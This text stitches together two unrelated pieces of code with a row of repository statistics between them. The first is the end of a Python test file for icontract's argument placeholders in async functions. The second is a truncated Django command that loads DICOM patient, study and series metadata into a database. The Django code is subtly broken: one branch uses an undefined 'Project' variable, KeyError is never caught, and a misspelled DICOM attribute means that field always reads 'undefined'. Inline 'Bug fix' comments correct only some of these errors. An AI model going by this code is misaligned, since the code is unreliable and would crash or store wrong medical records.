recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _KWARGS: set_kwargs(_KWARGS))
async def some_func(x: int, **kwargs: Any) -> None:
pass
await some_func(x=3, y=2)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 3, "y": 2}, recorded_kwargs)
async def test_kwargs_with_only_variable_keyword_arguments(self) -> None:
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_kwargs(kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_kwargs
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _KWARGS: set_kwargs(_KWARGS))
async def some_func(**kwargs: Any) -> None:
pass
await some_func(x=3, y=2, z=1)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 3, "y": 2, "z": 1}, recorded_kwargs)
async def test_kwargs_with_uncommon_argument_name_for_variable_keyword_arguments(self) -> None:
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_kwargs(kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_kwargs
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _KWARGS: set_kwargs(_KWARGS))
async def some_func(**parameters: Any) -> None:
pass
await some_func(x=3, y=2, z=1, a=0)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 3, "y": 2, "z": 1, "a": 0}, recorded_kwargs)
async def test_fail(self) -> None:
@icontract.require(lambda _KWARGS: 'x' in _KWARGS)
async def some_func(**kwargs: Any) -> None:
pass
violation_error = None # type: Optional[icontract.ViolationError]
try:
await some_func(y=3)
except icontract.ViolationError as err:
violation_error = err
assert violation_error is not None
self.assertEqual(
textwrap.dedent("""\
'x' in _KWARGS:
_KWARGS was {'y': 3}
y was 3"""), tests.error.wo_mandatory_location(str(violation_error)))
class TestArgsAndKwargs(unittest.IsolatedAsyncioTestCase):
async def test_that_args_and_kwargs_are_both_passed_as_placeholders(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_args_and_kwargs(args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_args
nonlocal recorded_kwargs
recorded_args = copy.copy(args)
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _ARGS, _KWARGS: set_args_and_kwargs(_ARGS, _KWARGS))
async def some_func(*args: Any, **kwargs: Any) -> None:
pass
await some_func(5, x=10, y=20, z=30)
assert recorded_args is not None
self.assertTupleEqual((5, ), recorded_args)
assert recorded_kwargs is not None
self.assertDictEqual({"x": 10, "y": 20, "z": 30}, recorded_kwargs)
async def test_a_very_mixed_case(self) -> None:
recorded_args = None # type: Optional[Tuple[Any, ...]]
recorded_kwargs = None # type: Optional[Dict[str, Any]]
def set_args_and_kwargs(args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> bool:
nonlocal recorded_args
nonlocal recorded_kwargs
recorded_args = copy.copy(args)
recorded_kwargs = copy.copy(kwargs)
return True
@icontract.require(lambda _ARGS, _KWARGS: set_args_and_kwargs(_ARGS, _KWARGS))
async def some_func(x: int, y: int, *args: Any, **kwargs: Any) -> None:
pass
await some_func(5, 10, 20, z=30)
assert recorded_args is not None
self.assertTupleEqual((5, 10, 20), recorded_args)
assert recorded_kwargs is not None
self.assertDictEqual({"z": 30}, recorded_kwargs)
class TestConflictOnARGSReported(unittest.IsolatedAsyncioTestCase):
async def test_in_kwargs_in_call(self) -> None:
@icontract.require(lambda _ARGS: True)
async def some_func(*args, **kwargs) -> None: # type: ignore
pass
type_error = None # type: Optional[TypeError]
try:
await some_func(_ARGS="something")
except TypeError as error:
type_error = error
assert type_error is not None
self.assertEqual('The arguments of the function call include "_ARGS" '
'which is a placeholder for positional arguments in a condition.', str(type_error))
class TestConflictOnKWARGSReported(unittest.IsolatedAsyncioTestCase):
async def test_in_kwargs_in_call(self) -> None:
@icontract.require(lambda _ARGS: True)
async def some_func(*args, **kwargs) -> None: # type: ignore
pass
type_error = None # type: Optional[TypeError]
try:
await some_func(_KWARGS="something")
except TypeError as error:
type_error = error
assert type_error is not None
self.assertEqual('The arguments of the function call include "_KWARGS" '
'which is a placeholder for keyword arguments in a condition.', str(type_error))
if __name__ == '__main__':
unittest.main()
| 34.692029
| 108
| 0.623708
| 1,160
| 9,575
| 4.926724
| 0.101724
| 0.062992
| 0.044794
| 0.036395
| 0.88399
| 0.844619
| 0.841645
| 0.793351
| 0.789151
| 0.726334
| 0
| 0.011134
| 0.277702
| 9,575
| 275
| 109
| 34.818182
| 0.815211
| 0.072585
| 0
| 0.656566
| 0
| 0
| 0.054878
| 0
| 0
| 0
| 0
| 0
| 0.161616
| 1
| 0.050505
| false
| 0.075758
| 0.030303
| 0
| 0.156566
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b255a7af425df26e05e8fb2c44b1dfc4dc6eebef
| 59,494
|
py
|
Python
|
data_base/management/commands/closepoll.py
|
Nicolas570/chris_db
|
a13853269847a0cbfa2be9ff7a4330ee1a38db21
|
[
"MIT"
] | null | null | null |
data_base/management/commands/closepoll.py
|
Nicolas570/chris_db
|
a13853269847a0cbfa2be9ff7a4330ee1a38db21
|
[
"MIT"
] | null | null | null |
data_base/management/commands/closepoll.py
|
Nicolas570/chris_db
|
a13853269847a0cbfa2be9ff7a4330ee1a38db21
|
[
"MIT"
] | null | null | null |
import os, pydicom, json
from django.core.management.base import BaseCommand
from polls.models import Patient, Study, Series, MR_Params, US_Params, CT_Params, User, Group
class Command(BaseCommand):
help = 'Finding .dcm files and complite tables'
def handle(self, *args, **options):
################################################################################
# frist this application read the dcm list file which contain each path of each
# frist dicom of each dicom folders.
# then we use all those paths and we change the path to get the meta.json file
################################################################################
#dcmTree = '/neuro/users/nicolas.charlet/CodeDcmDb/db_dcm.lst'
dcmTree = '/neuro/users/nicolas.charlet/db_dcm.lst'
if len(args) == 2:
if args[0] == 'path':
dcmTree = args[1]
data = [line.strip() for line in open(dcmTree, 'r')]
N_lignes = len(data)
for line in data:
#dcmFile = '/neuro/users/chris/data/%s' % line
dcmFile = '/neuro/users/nicolas.charlet/ChrisDbTest/%s' % line
t = line
t_l = t.split('/')
t_l[4] = 'meta.json'
nline = '/'.join(t_l)
#metaFile = '/neuro/users/chris/data/%s' % nline
metaFile = '/neuro/users/nicolas.charlet/ChrisDbTest/%s' % nline
print(dcmFile)
print(metaFile)
b_metaFileExists = False
################################################################################
# here we read each dicoms with pydicom and each metaFile as json file.
# then we test if Series, study or patient allready exists.
################################################################################
ds = pydicom.read_file(dcmFile)
try:
with open(metaFile) as meta:
data = json.load(meta)
b_metaFileExists = True
except:
print('no .json detected')
pass
test_SeriesInstanceUID=str(ds.SeriesInstanceUID)
test_StudyInstanceUID=str(ds.StudyInstanceUID)
test_PatientID=str(ds.PatientID)
search1 = Series.objects.all().filter(SeriesInstanceUID=test_SeriesInstanceUID)
#print(search1)
search2 = Study.objects.all().filter(StudyInstanceUID=test_StudyInstanceUID)
#print(search2)
search3 = Patient.objects.all().filter(PatientID=test_PatientID)
#print(search3)
################################################################################
# the first search is the case where the series allready exist, if it exist
# we don't add this series in the data base.
################################################################################
if search1.exists():
print('series already exists')
#on fait rien, la SeriesInstanceUID existe deja
for line in data:
UserID = data[line]['uid']
GroupId = data[line]['gid']
test_uid = UserID
test_gid = GroupId
print(test_uid)
print(test_gid)
################################################################################
# now we test if user are allready linked to this series or not.
# then if it exist we check if the group is link to the user and if it exist
# allready.
################################################################################
searchSUser = Series.objects.filter(user__UserID__startswith=test_uid)
# print('user id:')
# print(searchSUser)
searchUser = User.objects.all().filter(UserID=test_uid)
searchUGroup = User.objects.filter(group__GroupId__startswith=test_gid)
searchGroup = Group.objects.all().filter(GroupId=test_gid)
if searchUser.exists():
if searchSUser.exists():
print('user already in the series')
else:
search1.first().user.add(searchUser.first())
print('user added')
if searchUGroup.exists():
#print("user & group exist ")
print('user already in the data base')
else:
if searchGroup.exists():
#print("user & group exist but user not in that group")
searchUser.first().group.add(searchGroup.first())
else:
#print("user exist but not group")
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,Project=Project)
gr.save()
searchUser.first().group.add(gr)
else:
#print("new user & new group")
####################### Group table ######################
if searchGroup.exists():
#print("user not exist & group exist")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(searchGroup.first())
search1.first().user.add(user)
else:
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
#print("group")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(gr)
# Bug fix: link the User *instance* just created ('user'), not the User model
# class itself — the sibling branch above (searchGroup exists) does
# search1.first().user.add(user) with the freshly created instance.
search1.first().user.add(user)
#print("end")
################################################################################
# This case is when the study already exists, so we don't create the same
# study and patient twice.
# Compared to the first case, we don't check whether the user is already
# linked to the series; we just link them directly.
################################################################################
elif search2.exists():
####################### Series table ######################
try:
SeriesNumber=ds.SeriesNumber
except NameError:
SeriesNumber = 'undefined'
except AttributeError:
SeriesNumber = 'undefined'
try:
SeriesInstanceUID=str(ds.SeriesInstanceUID)
except NameError:
SeriesInstanceUID = 'undefined'
except AttributeError:
SeriesInstanceUID = 'undefined'
try:
ProtocolName=ds.ProtocolName
except NameError:
ProtocolName = 'undefined'
except AttributeError:
ProtocolName = 'undefined'
try:
Modality=ds.Modality
except NameError:
Modality = 'undefined'
except AttributeError:
Modality = 'undefined'
try:
SeriesDescription=ds.SeriesDescription
except NameError:
SeriesDescription = 'undefined'
except AttributeError:
SeriesDescription = 'undefined'
try:
SeriesTime=ds.SeriesTime
except NameError:
SeriesTime = 'undefined'
except AttributeError:
SeriesTime = 'undefined'
try:
ContrastAgent=ds.ContrastAgent
except NameError:
ContrastAgent = 'undefined'
except AttributeError:
ContrastAgent = 'undefined'
try:
ScanningSequence=ds.ScanningSequence
except NameError:
ScanningSequence = 'undefined'
except AttributeError:
ScanningSequence = 'undefined'
try:
BodyPartExaminated=ds.BodyPartExaminated
except NameError:
BodyPartExaminated = 'undefined'
except AttributeError:
BodyPartExaminated = 'undefined'
try:
AcquisitionNumber=ds.AcquisitionNumber
except NameError:
AcquisitionNumber = 'undefined'
except AttributeError:
AcquisitionNumber = 'undefined'
b3=Series(SeriesNumber=SeriesNumber,SeriesInstanceUID=SeriesInstanceUID,ProtocolName=ProtocolName,Modality=Modality,
SeriesDescription=SeriesDescription,SeriesTime=SeriesTime,ContrastAgent=ContrastAgent,ScanningSequence=ScanningSequence,
BodyPartExaminated=BodyPartExaminated,AcquisitionNumber=AcquisitionNumber,study=search2.first())
b3.save()
# group and user table
for line in data:
UserID = data[line]['uid']
GroupId = data[line]['gid']
test_uid = UserID
test_gid = GroupId
print(test_uid)
print(test_gid)
searchUser = User.objects.all().filter(UserID=test_uid)
searchUGroup = User.objects.filter(group__GroupId__startswith=test_gid)
searchGroup = Group.objects.all().filter(GroupId=test_gid)
if searchUser.exists():
b3.user.add(searchUser.first())
if searchUGroup.exists():
#print("user & group exist ")
print('user already in the data base')
else:
if searchGroup.exists():
#print("user & group exist but user not in that group")
searchUser.first().group.add(searchGroup.first())
else:
#print("user exist but not group")
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
# Bug fix: the original passed Project=Project — 'Project' is never defined
# (NameError at runtime) and the model field used by every parallel branch
# is GroupProject. Persist the GroupProject value extracted just above.
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
searchUser.first().group.add(gr)
else:
#print("new user & new group")
####################### Group table ######################
if searchGroup.exists():
#print("user not exist & group exist")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(searchGroup.first())
b3.user.add(user)
else:
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
#print("group")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(gr)
b3.user.add(user)
#print("end")
############ MR_Params table ##############
try:
PixelSpacing=ds.PixelSpacing
except NameError:
PixelSpacing = 'undefined'
except AttributeError:
PixelSpacing = 'undefined'
try:
SliceThickness=ds.SliceThickness
except NameError:
SliceThickness = 'undefined'
except AttributeError:
SliceThickness = 'undefined'
try:
EchoTime=ds.EchoTime
except NameError:
EchoTime = 'undefined'
except AttributeError:
EchoTime = 'undefined'
try:
EchoNumbers=ds.EchoNumbers
except NameError:
EchoNumbers = 'undefined'
except AttributeError:
EchoNumbers = 'undefined'
try:
InversionTime=ds.InversionTime
except NameError:
InversionTime = 'undefined'
except AttributeError:
InversionTime = 'undefined'
try:
RepetitionTime=ds.RepetitionTime
except NameError:
RepetitionTime = 'undefined'
except AttributeError:
RepetitionTime = 'undefined'
b4=MR_Params(PixelSpacing=PixelSpacing,SliceThickness=SliceThickness,EchoTime=EchoTime,EchoNumbers=EchoNumbers,
InversionTime=InversionTime,RepetitionTime=RepetitionTime,
modality_params= b3)
b4.save()
############# US_Params ###############
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b5=US_Params(Name=Name,modality_params=b3)
b5.save()
################ CT_Params ####################
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b6=CT_Params(Name=Name,modality_params=b3)
b6.save()
################################################################################
# This case is when the patient already exists, so we only create the other
# tables to avoid having the same patient twice.
# For the user and group it is the same as the previous case.
################################################################################
elif search3.exists():
################## Study table ####################
try:
StudyDescription=ds.StudyDescription
except NameError:
StudyDescription = 'undefined'
except AttributeError:
StudyDescription = 'undefined'
try:
StationName=ds.StationName
except NameError:
StationName = 'undefined'
except AttributeError:
StationName = 'undefined'
try:
ManufacturerModelName=ds.ManufacturerModelName
except NameError:
ManufacturerModelName = 'undefined'
except AttributeError:
ManufacturerModelName = 'undefined'
try:
StudyInstanceUID=str(ds.StudyInstanceUID)
except NameError:
StudyInstanceUID = 'undefined'
except AttributeError:
StudyInstanceUID = 'undefined'
try:
Pathology=ds.Pathology
except NameError:
Pathology = 'undefined'
except AttributeError:
Pathology = 'undefined'
try:
StudyDate=ds.StudyDate
except NameError:
StudyDate = 'undefined'
except AttributeError:
StudyDate = 'undefined'
try:
StudyTime=ds.StudyTime
except NameError:
StudyTime = 'undefined'
except AttributeError:
StudyTime = 'undefined'
try:
AccessionNumber=ds.AccessionNumber
except NameError:
AccessionNumber = 'undefined'
except AttributeError:
AccessionNumber = 'undefined'
try:
InstitutionName=ds.InstitutionName
except NameError:
InstitutionName = 'undefined'
except AttributeError:
InstitutionName = 'undefined'
try:
ReferringPhysicianName=ds.ReferringPhysicianName
except NameError:
ReferringPhysicianName = 'undefined'
except AttributeError:
ReferringPhysicianName = 'undefined'
try:
PerformingPhysicianName=ds.PerformingPhysicianName
except NameError:
PerformingPhysicianName = 'undefined'
except AttributeError:
PerformingPhysicianName = 'undefined'
try:
ModalitiesInStudy=ds.ModalitiesInStudy
except NameError:
ModalitiesInStudy = 'undefined'
except AttributeError:
ModalitiesInStudy = 'undefined'
try:
MagneticFieldStrength=ds.MagneticFieldStrength
except NameError:
MagneticFieldStrength = 0
except AttributeError:
MagneticFieldStrength = 0
b2=Study(StudyDescription=StudyDescription,StationName=StationName,ManufacturerModelName=ManufacturerModelName,
StudyInstanceUID=StudyInstanceUID,Pathology=Pathology,StudyDate=StudyDate,
StudyTime=StudyTime,AccessionNumber=AccessionNumber,InstitutionName=InstitutionName,
ReferringPhysicianName=ReferringPhysicianName,ModalitiesInStudy=ModalitiesInStudy,
MagneticFieldStrength=MagneticFieldStrength,patient=search3.first())
b2.save()
####################### Series table ######################
try:
SeriesNumber=ds.SeriesNumber
except NameError:
SeriesNumber = 'undefined'
except AttributeError:
SeriesNumber = 'undefined'
try:
SeriesInstanceUID=str(ds.SeriesInstanceUID)
except NameError:
SeriesInstanceUID = 'undefined'
except AttributeError:
SeriesInstanceUID = 'undefined'
try:
ProtocolName=ds.ProtocolName
except NameError:
ProtocolName = 'undefined'
except AttributeError:
ProtocolName = 'undefined'
try:
Modality=ds.Modality
except NameError:
Modality = 'undefined'
except AttributeError:
Modality = 'undefined'
try:
SeriesDescription=ds.SeriesDescription
except NameError:
SeriesDescription = 'undefined'
except AttributeError:
SeriesDescription = 'undefined'
try:
SeriesTime=ds.SeriesTime
except NameError:
SeriesTime = 'undefined'
except AttributeError:
SeriesTime = 'undefined'
try:
ContrastAgent=ds.ContrastAgent
except NameError:
ContrastAgent = 'undefined'
except AttributeError:
ContrastAgent = 'undefined'
try:
ScanningSequence=ds.ScanningSequence
except NameError:
ScanningSequence = 'undefined'
except AttributeError:
ScanningSequence = 'undefined'
try:
BodyPartExaminated=ds.BodyPartExaminated
except NameError:
BodyPartExaminated = 'undefined'
except AttributeError:
BodyPartExaminated = 'undefined'
try:
AcquisitionNumber=ds.AcquisitionNumber
except NameError:
AcquisitionNumber = 'undefined'
except AttributeError:
AcquisitionNumber = 'undefined'
# Bug fix: this is the 'patient exists' (search3) branch, which only runs when
# search2 matched nothing — so search2.first() is None and linking the Series
# to it is wrong (copy-paste from the search2 branch). Attach the Series to
# the Study 'b2' created just above in this branch, mirroring the final
# 'create everything' branch which uses study=b2.
b3=Series(SeriesNumber=SeriesNumber,SeriesInstanceUID=SeriesInstanceUID,ProtocolName=ProtocolName,Modality=Modality,
          SeriesDescription=SeriesDescription,SeriesTime=SeriesTime,ContrastAgent=ContrastAgent,ScanningSequence=ScanningSequence,
          BodyPartExaminated=BodyPartExaminated,AcquisitionNumber=AcquisitionNumber,study=b2)
b3.save()
# group and user
for line in data:
UserID = data[line]['uid']
GroupId = data[line]['gid']
test_uid = UserID
test_gid = GroupId
print(test_uid)
print(test_gid)
searchUser = User.objects.all().filter(UserID=test_uid)
searchUGroup = User.objects.filter(group__GroupId__startswith=test_gid)
searchGroup = Group.objects.all().filter(GroupId=test_gid)
#searchSUser = Series.objects.filter(user__GroupId__startswith=)
if searchUser.exists():
b3.user.add(searchUser.first())
if searchUGroup.exists():
#print("user & group exist ")
print('user already in the data base')
else:
if searchGroup.exists():
#print("user & group exist but user not in that group")
searchUser.first().group.add(searchGroup.first())
else:
#print("user exist but not group")
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
# Bug fix: the original passed Project=Project — 'Project' is never defined
# (NameError at runtime) and the model field used by every parallel branch
# is GroupProject. Persist the GroupProject value extracted just above.
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
searchUser.first().group.add(gr)
else:
#print("new user & new group")
####################### Group table ######################
if searchGroup.exists():
#print("user not exist & group exist")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(searchGroup.first())
b3.user.add(user)
else:
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
#print("group")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(gr)
b3.user.add(user)
#print("end")
############ MR_Params table ##############
try:
PixelSpacing=ds.PixelSpacing
except NameError:
PixelSpacing = 'undefined'
except AttributeError:
PixelSpacing = 'undefined'
try:
SliceThickness=ds.SliceThickness
except NameError:
SliceThickness = 'undefined'
except AttributeError:
SliceThickness = 'undefined'
try:
EchoTime=ds.EchoTime
except NameError:
EchoTime = 'undefined'
except AttributeError:
EchoTime = 'undefined'
try:
EchoNumbers=ds.EchoNumbers
except NameError:
EchoNumbers = 'undefined'
except AttributeError:
EchoNumbers = 'undefined'
try:
InversionTime=ds.InversionTime
except NameError:
InversionTime = 'undefined'
except AttributeError:
InversionTime = 'undefined'
try:
RepetitionTime=ds.RepetitionTime
except NameError:
RepetitionTime = 'undefined'
except AttributeError:
RepetitionTime = 'undefined'
b4=MR_Params(PixelSpacing=PixelSpacing,SliceThickness=SliceThickness,EchoTime=EchoTime,EchoNumbers=EchoNumbers,
InversionTime=InversionTime,RepetitionTime=RepetitionTime,
modality_params= b3)
b4.save()
############# US_Params ###############
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b5=US_Params(Name=Name,modality_params=b3)
b5.save()
################ CT_Params ####################
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b6=CT_Params(Name=Name,modality_params=b3)
b6.save()
################################################################################
# This case is when we have to create every table from scratch.
# For the user and group it is the same as the previous case.
################################################################################
else:
################# Patient table ###################
try:
PatientID=ds.PatientID
except NameError:
PatientID = 'undefined'
except AttributeError:
PatientID = 'undefined'
try:
PatientName=ds.PatientName
except NameError:
PatientName = 'undefined'
except AttributeError:
PatientName = 'undefined'
try:
PatientAge=ds.PatientAge
except NameError:
PatientAge = 'undefined'
except AttributeError:
PatientAge = 'undefined'
try:
PatientSex=ds.PatientSex
except NameError:
PatientSex = 'undefined'
except AttributeError:
PatientSex = 'undefined'
try:
PatientBirthDate=ds.PatientBirthDate
except NameError:
PatientBirthDate = 'undefined'
except AttributeError:
PatientBirthDate = 'undefined'
try:
PatientBirthTime=ds.PatientBirthTime
except NameError:
PatientBirthTime = 'undefined'
except AttributeError:
PatientBirthTime = 'undefined'
b1=Patient(PatientID=PatientID, PatientAge=PatientAge, PatientSex=PatientSex,PatientName=PatientName,
PatientBirthDate=PatientBirthDate, PatientBirthTime=PatientBirthTime)
b1.save()
################## Study table ####################
try:
StudyDescription=ds.StudyDescription
except NameError:
StudyDescription = 'undefined'
except AttributeError:
StudyDescription = 'undefined'
try:
StationName=ds.StationName
except NameError:
StationName = 'undefined'
except AttributeError:
StationName = 'undefined'
try:
ManufacturerModelName=ds.ManufacturerModelName
except NameError:
ManufacturerModelName = 'undefined'
except AttributeError:
ManufacturerModelName = 'undefined'
try:
StudyInstanceUID=str(ds.StudyInstanceUID)
except NameError:
StudyInstanceUID = 'undefined'
except AttributeError:
StudyInstanceUID = 'undefined'
try:
Pathology=ds.Pathology
except NameError:
Pathology = 'undefined'
except AttributeError:
Pathology = 'undefined'
try:
StudyDate=ds.StudyDate
except NameError:
StudyDate = 'undefined'
except AttributeError:
StudyDate = 'undefined'
try:
StudyTime=ds.StudyTime
except NameError:
StudyTime = 'undefined'
except AttributeError:
StudyTime = 'undefined'
try:
AccessionNumber=ds.AccessionNumber
except NameError:
AccessionNumber = 'undefined'
except AttributeError:
AccessionNumber = 'undefined'
try:
InstitutionName=ds.InstitutionName
except NameError:
InstitutionName = 'undefined'
except AttributeError:
InstitutionName = 'undefined'
try:
ReferringPhysicianName=ds.ReferringPhysicianName
except NameError:
ReferringPhysicianName = 'undefined'
except AttributeError:
ReferringPhysicianName = 'undefined'
try:
PerformingPhysicianName=ds.PerformingPhysicianName
except NameError:
PerformingPhysicianName = 'undefined'
except AttributeError:
PerformingPhysicianName = 'undefined'
try:
ModalitiesInStudy=ds.ModalitiesInStudy
except NameError:
ModalitiesInStudy = 'undefined'
except AttributeError:
ModalitiesInStudy = 'undefined'
try:
MagneticFieldStrength=ds.MagneticFieldStrength
except NameError:
MagneticFieldStrength = 0
except AttributeError:
MagneticFieldStrength = 0
b2=Study(StudyDescription=StudyDescription,StationName=StationName,ManufacturerModelName=ManufacturerModelName,
StudyInstanceUID=StudyInstanceUID,Pathology=Pathology,StudyDate=StudyDate,
StudyTime=StudyTime,AccessionNumber=AccessionNumber,InstitutionName=InstitutionName,
ReferringPhysicianName=ReferringPhysicianName,ModalitiesInStudy=ModalitiesInStudy,
MagneticFieldStrength=MagneticFieldStrength,patient=b1)
b2.save()
####################### Series table ######################
try:
SeriesNumber=ds.SeriesNumber
except NameError:
SeriesNumber = 'undefined'
except AttributeError:
SeriesNumber = 'undefined'
try:
SeriesInstanceUID=str(ds.SeriesInstanceUID)
except NameError:
SeriesInstanceUID = 'undefined'
except AttributeError:
SeriesInstanceUID = 'undefined'
try:
ProtocolName=ds.ProtocolName
except NameError:
ProtocolName = 'undefined'
except AttributeError:
ProtocolName = 'undefined'
try:
Modality=ds.Modality
except NameError:
Modality = 'undefined'
except AttributeError:
Modality = 'undefined'
try:
SeriesDescription=ds.SeriesDescription
except NameError:
SeriesDescription = 'undefined'
except AttributeError:
SeriesDescription = 'undefined'
try:
SeriesTime=ds.SeriesTime
except NameError:
SeriesTime = 'undefined'
except AttributeError:
SeriesTime = 'undefined'
try:
ContrastAgent=ds.ContrastAgent
except NameError:
ContrastAgent = 'undefined'
except AttributeError:
ContrastAgent = 'undefined'
try:
ScanningSequence=ds.ScanningSequence
except NameError:
ScanningSequence = 'undefined'
except AttributeError:
ScanningSequence = 'undefined'
try:
BodyPartExaminated=ds.BodyPartExaminated
except NameError:
BodyPartExaminated = 'undefined'
except AttributeError:
BodyPartExaminated = 'undefined'
try:
AcquisitionNumber=ds.AcquisitionNumber
except NameError:
AcquisitionNumber = 'undefined'
except AttributeError:
AcquisitionNumber = 'undefined'
